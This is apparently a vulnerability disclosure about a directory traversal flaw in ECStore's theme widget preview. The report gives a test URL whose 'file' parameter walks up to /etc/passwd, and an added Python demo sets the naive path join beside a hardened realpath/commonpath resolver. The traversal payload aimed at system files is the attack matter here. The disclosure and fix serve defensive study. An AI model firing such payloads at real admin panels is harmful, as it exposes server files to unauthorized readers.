### Brief description:
The back-end template editor can be abused to read system files outside the template directory.
### Details:
The `file` parameter of the theme widget preview action is not filtered for `../`, so a relative path can walk out of the theme directory and read arbitrary files that the web server process can access (directory traversal).
Test URL: http://shop.xxx.com/index.php/shopadmin/index.php?app=site&ctl=admin_theme_widget&act=preview&theme=ecstore&file=../../../../../etc/passwd
[![2.png](https://images.seebug.org/upload/201412/02233108c5e641e40157994bb38a463d7d18ff19.png)](https://images.seebug.org/upload/201412/02233108c5e641e40157994bb38a463d7d18ff19.png)
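The following is an added example, not code from the original report or from ECStore, that reproduces the weak pattern the report describes (user-supplied `file` value joined onto the theme directory with no containment check) next to a hardened resolver. The directory layout, the `naive_theme_path` and `safe_theme_path` function names and the constructed `secret.txt` file standing in for `/etc/passwd` are all assumptions made for the demonstration; the real application is PHP, where the same fix is `realpath()` plus a check that the result still starts with the theme root.

```python
import os
import tempfile
from typing import Optional


def naive_theme_path(theme_root: str, file_param: str) -> str:
    """Vulnerable pattern (hypothetical reconstruction): the request's `file`
    value is concatenated onto the theme directory with no traversal check,
    so `../../../../../etc/passwd` walks out of the theme root."""
    return os.path.join(theme_root, file_param)


def safe_theme_path(theme_root: str, file_param: str) -> Optional[str]:
    """Hardened resolution: canonicalise both sides and require the result to
    remain inside theme_root. Returns None for anything that escapes."""
    root = os.path.realpath(theme_root)
    # Reject empty values, embedded NUL bytes and absolute paths outright.
    if not file_param or "\x00" in file_param or os.path.isabs(file_param):
        return None
    candidate = os.path.realpath(os.path.join(root, file_param))
    # commonpath handles the "/themes/ecstore" vs "/themes/ecstore2" prefix
    # trap that a plain startswith() check would fall into.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo() -> dict:
    """Build a constructed theme tree in a temp dir and compare both resolvers.
    The file outside the theme root stands in for /etc/passwd."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "themes", "ecstore")
        os.makedirs(os.path.join(root, "widgets"))
        with open(os.path.join(root, "widgets", "demo.html"), "w") as f:
            f.write("<p>widget template</p>")
        outside = os.path.join(tmp, "secret.txt")  # constructed stand-in for /etc/passwd
        with open(outside, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")

        traversal = "../../secret.txt"  # two levels up from themes/ecstore
        with open(naive_theme_path(root, traversal)) as f:
            leaked = f.read()

        legit = os.path.realpath(os.path.join(root, "widgets", "demo.html"))
        return {
            # the naive join happily reads the file outside the theme root
            "naive_reads_outside": leaked.startswith("root:x:0:0"),
            # the hardened resolver refuses plain and nested traversal
            "safe_rejects_traversal": safe_theme_path(root, traversal) is None,
            "safe_rejects_nested": safe_theme_path(root, "widgets/../../../secret.txt") is None,
            "safe_rejects_absolute": safe_theme_path(root, "/etc/passwd") is None,
            # and still serves a genuine template inside the theme
            "safe_allows_legit": safe_theme_path(root, "widgets/demo.html") == legit,
        }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

Note that the traversal string reaches the application already URL-decoded (PHP decodes the query string before populating `$_GET`), so a check that only looks for the literal `%2e%2e` would miss it; resolving the canonical path and testing containment is what closes the hole.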
### Proof of vulnerability:
[![3.png](https://images.seebug.org/upload/201412/02233617ec2d6faa50283951e40dd6cf94272054.png)](https://images.seebug.org/upload/201412/02233617ec2d6faa50283951e40dd6cf94272054.png)